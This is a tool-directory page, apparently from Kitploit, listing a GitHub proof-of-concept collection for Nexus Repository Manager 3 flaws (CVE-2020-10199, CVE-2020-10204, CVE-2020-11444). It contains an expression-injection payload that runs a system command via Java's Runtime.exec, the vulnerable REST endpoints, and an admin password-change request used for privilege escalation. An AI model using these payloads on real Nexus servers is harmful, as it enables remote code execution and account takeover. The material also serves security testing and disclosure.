Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/jas502n/cve-2020-10199
Privilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubjas502n/cve-2020-10199

CVE-2020-10199

PoC exploit collection for Nexus Repository Manager 3 vulnerabilities (CVE-2020-10199, CVE-2020-10204, CVE-2020-11444) enabling remote code execution and privilege escalation via HTTP endpoints.

View Repository
35966 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Nexus Repository Manager 3 Vuln (Affected versions: <= 3.21.2)

CVE-2020-10199, CVE-2020-10204, CVE-2020-11444

CVE-2020-10199 Remote Code Execution

Echo PoC

No Echo PoC

$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/cve-2020-10199')}

Normal User Privileges

/service/rest/beta/repositories/go/group

Requires Admin Privileges

  1. Create CleanupPolicy

/service/extdirect

  1. Create repositories

/service/rest/beta/repositories/apt/hosted

CVE-2020-10204 Remote Code Execution

  1. Using the update user endpoint /service/extdirect
  2. Using the create role endpoint /service/extdirect

CVE-2020-11444 Privilege Escalation Vulnerability

Calling the update role endpoint

/service/rest/beta/security/users/admin/change-password

POST:
123456

References

https://www.cnblogs.com/magic-zero/p/12641068.html

https://github.com/threedr3am/learnjavabug/tree/93d57c428333f98b5927d02630737e639dcb226b/nexus

Download Tool